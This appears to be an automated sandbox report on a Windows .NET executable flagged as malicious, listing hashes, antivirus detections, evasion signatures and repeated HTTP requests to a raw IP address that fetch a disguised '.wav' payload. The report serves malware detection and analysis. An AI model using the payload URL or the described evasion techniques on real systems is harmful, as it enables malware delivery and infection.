Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Copy60330548196.exe

Overview

General Information

Sample name:Copy60330548196.exe
Analysis ID:1526377
MD5:f6059b7e84de5f51eb7c2be5874c895e
SHA1:b9da6c67e47cb2b21125a1d0b9ba469b3b5ecacd
SHA256:59e7fb46b2712f447bd8e6da840d2000f9f7af01c843a111c851745ec8f6a04d
Tags:exeuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Machine Learning detection for sample
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

  • System is w10x64
  • Copy60330548196.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Copy60330548196.exe" MD5: F6059B7E84DE5F51EB7C2BE5874C895E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Copy60330548196.exeAvira: detected
Source: http://98.142.254.109/ii/Meqvrjzz.wavVirustotal: Detection: 13%Perma Link
Source: http://98.142.254.109Virustotal: Detection: 5%Perma Link
Source: Copy60330548196.exeVirustotal: Detection: 70%Perma Link
Source: Copy60330548196.exeReversingLabs: Detection: 60%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
Source: Copy60330548196.exeJoe Sandbox ML: detected
Source: Copy60330548196.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Copy60330548196.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 98.142.254.109 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: unknownTCP traffic detected without corresponding DNS query: 98.142.254.109
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ii/Meqvrjzz.wav HTTP/1.1Host: 98.142.254.109Connection: Keep-Alive
Source: Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.142.254.109
Source: Copy60330548196.exeString found in binary or memory: http://98.142.254.109/ii/Meqvrjzz.wav
Source: Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.142.254.109/ii/Meqvrjzz.wavP
Source: Copy60330548196.exe, 00000000.00000002.3911013213.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.142.254.109/ii/Meqvrjzz.wavt
Source: Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.142.254.109D
Source: Copy60330548196.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Copy60330548196.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Copy60330548196.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Copy60330548196.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Copy60330548196.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Copy60330548196.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Copy60330548196.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Copy60330548196.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: Copy60330548196.exeString found in binary or memory: http://ocsp.digicert.com0N
Source: Copy60330548196.exeString found in binary or memory: http://ocsp.thawte.com0
Source: Copy60330548196.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Copy60330548196.exeString found in binary or memory: http://s.symcd.com06
Source: Copy60330548196.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Copy60330548196.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Copy60330548196.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Copy60330548196.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Copy60330548196.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Copy60330548196.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Copy60330548196.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Copy60330548196.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Copy60330548196.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: Copy60330548196.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: Copy60330548196.exeString found in binary or memory: https://d.symcb.com/rpa0.
Source: Copy60330548196.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess Stats: CPU usage > 49%
Source: Copy60330548196.exeStatic PE information: invalid certificate
Source: Copy60330548196.exe, 00000000.00000002.3910279380.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Copy60330548196.exe
Source: Copy60330548196.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal76.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\Copy60330548196.exeMutant created: NULL
Source: Copy60330548196.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Copy60330548196.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Copy60330548196.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Copy60330548196.exeVirustotal: Detection: 70%
Source: Copy60330548196.exeReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: Copy60330548196.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Copy60330548196.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: Copy60330548196.exe, UtilsInterceptorStub.cs.Net Code: ComputeAuthentication System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeWindow / User API: threadDelayed 1597Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeWindow / User API: threadDelayed 8242Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep count: 34 > 30Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -31359464925306218s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 3656Thread sleep count: 1597 > 30Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 3656Thread sleep count: 8242 > 30Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99859s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99750s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99640s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99530s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99421s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99312s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99203s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -99093s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98984s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98874s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98685s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98577s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98275s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98171s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -98051s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97937s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97827s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97718s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97609s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97499s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97390s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97171s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -97062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96952s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96843s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96624s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96515s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96405s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96296s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96187s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -96077s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95968s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95859s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95749s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95640s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95531s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95421s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95203s >= -30000sJump to behavior
